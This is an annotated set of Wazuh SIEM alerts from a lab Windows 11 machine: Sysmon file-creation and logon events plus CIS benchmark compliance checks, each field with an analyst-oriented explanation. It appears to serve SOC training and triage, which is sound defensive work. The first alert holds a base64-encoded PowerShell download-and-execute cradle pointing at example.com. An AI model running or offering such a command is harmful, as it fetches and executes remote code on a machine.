data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 116 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534438.2122420 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:36.7393600Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286075 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:36.716
ProcessGuid: {94294ddc-bde3-680a-db0b-000000000e00}
ProcessId: 6708
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_incsmgqj.jzi.ps1
CreationUtcTime: 2025-04-24 22:40:36.716
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:36.716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bde3-680a-db0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6708 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_incsmgqj.jzi.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:36.716 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534468.2125185 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26163 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Authorization Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in authorization policy. Events for this subcategory include: - 4704: A user right was assigned. - 4705: A user right was removed. - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4714: Encrypted data recovery policy was changed. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Authorization Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Authorization Policy Change"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534492.2128210 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:27.0967356Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43893 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534507.2135547 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26164 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory determines whether the operating system generates audit events when changes are made to policy rules for the Microsoft Protection Service (MPSSVC.exe). Events for this subcategory include: - 4944: The following policy was active when the Windows Firewall started. - 4945: A rule was listed when the Windows Firewall started. - 4946: A change has been made to Windows Firewall exception list. A rule was added. - 4947: A change has been made to Windows Firewall exception list. A rule was modified. - 4948: A change has been made to Windows Firewall exception list. A rule was deleted. - 4949: Windows Firewall settings were restored to the default values. - 4950: A Windows Firewall setting has changed. - 4951: A rule has been ignored because its major version number was not recognized by Windows Firewall. - 4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced. - 4953: A rule has been ignored by Windows Firewall because it could not parse the rule. - 4954: Windows Firewall Group Policy settings have changed. The new settings have been applied. - 4956: Windows Firewall has changed the active profile. - 4957: Windows Firewall did not apply the following rule. - 4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer. The recommended state for this setting is : Success and Failure Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Changes to firewall rules are important for understanding the security state of the computer and how well it is protected against network attacks. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit MPSSVC Rule-Level Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534509.2141014 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:41.9709687Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43895 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 15764 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is the well‑known Local System SID.
data.win.eventdata.subjectUserName: ATTACKER$ Account that requested the logon; the trailing $ marks the computer account itself.
data.win.eventdata.subjectDomainName: WORKGROUP Domain or workgroup of the requesting account.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session ID of the requester. 0x3e7 (999) is the well‑known SYSTEM session.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was actually logged on (the New Logon section of the message).
data.win.eventdata.targetUserName: SYSTEM Account that was logged on – the name to pivot on when chasing later process events.
data.win.eventdata.targetDomainName: NT AUTHORITY Domain of the logged‑on account; NT AUTHORITY marks a built‑in account.
data.win.eventdata.targetLogonId: 0x3e7 Logon session ID created by this logon; later process events that carry LogonId 0x3E7 belong to this session.
data.win.eventdata.logonType: 5 Numeric logon type. 5 = Service: a service started by the Service Control Manager, which matches services.exe as the requesting process.
data.win.eventdata.logonProcessName: Advapi Trusted logon process that requested the session; Advapi means the logon came through the LogonUser API.
data.win.eventdata.authenticationPackageName: Negotiate Authentication package used; Negotiate selects Kerberos or NTLM at runtime.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} GUID used to correlate with KDC (Kerberos) events; all zeros means no ticket was involved, so there is nothing to correlate.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks. 0 here means no session key was requested, as the message text states.
data.win.eventdata.processId: 0x304 PID (hex) of the process that requested the logon; 0x304 = 772.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Process that requested the logon. services.exe is the Service Control Manager, the expected requester for a type‑5 logon.
data.win.eventdata.impersonationLevel: %%1833 Windows resource‑string ID; renders as "Impersonation" in the message text.
data.win.eventdata.virtualAccount: %%1843 Windows resource‑string ID; renders as "No" (not a virtual account).
data.win.eventdata.targetLinkedLogonId: 0x0 ID of the linked (split UAC token) logon session; 0x0 means there is none.
data.win.eventdata.elevatedToken: %%1842 Windows resource‑string ID; renders as "Yes" (the session holds a full administrative token).
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32) Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19004 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534518.2148353 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: summary SCA event type: summary (totals for a whole scan) or check (result of one benchmark test).
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.description: This document provides prescriptive guidance for establishing a secure configuration posture for Microsoft Windows 11. The benchmark's own one‑line description of its scope, copied from the policy file.
data.sca.policy_id: cis_win11_enterprise_21H2 Internal string ID for that policy; stable across scans, so use it for filtering rather than the display name.
data.sca.passed: 121 Checks that were green – a quick confidence boost.
data.sca.failed: 249 Number of failed checks in the scan. Lots of red means poor hygiene.
data.sca.invalid: 25 Checks that couldn’t run (permissions, missing file, etc.).
data.sca.total_checks: 395 Total tests executed this run.
data.sca.score: 32 Overall compliance score 0‑100%. Under 85% usually needs remediation.
data.sca.file: cis_win11_enterprise.yml Policy file (YAML) the SCA module evaluated – open it to see each check's exact test logic.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] Maps to the CIS Critical Security Controls (the control set, as opposed to the per‑OS benchmark in rule.cis).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534518.2149670 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check SCA event type: check (result of one benchmark test) as opposed to summary (totals for a whole scan).
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26000 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enforce password history' is set to '24 or more password(s)'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the number of renewed, unique passwords that have to be associated with a user account before you can reuse an old password. The value for this policy setting must be between 0 and 24 passwords. The default value for Windows Vista is 0 passwords, but the default setting in a domain is 24 passwords. To maintain the effectiveness of this policy setting, use the Minimum password age setting to prevent users from repeatedly changing their password. The recommended state for this setting is: 24 or more password(s). Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Note #2: As of the publication of this benchmark, Microsoft currently has a maximum limit of 24 saved passwords. For more information, please visit Enforce password history (Windows 10) - Windows security | Microsoft Docs Detailed what/why of the check – great learning resource.
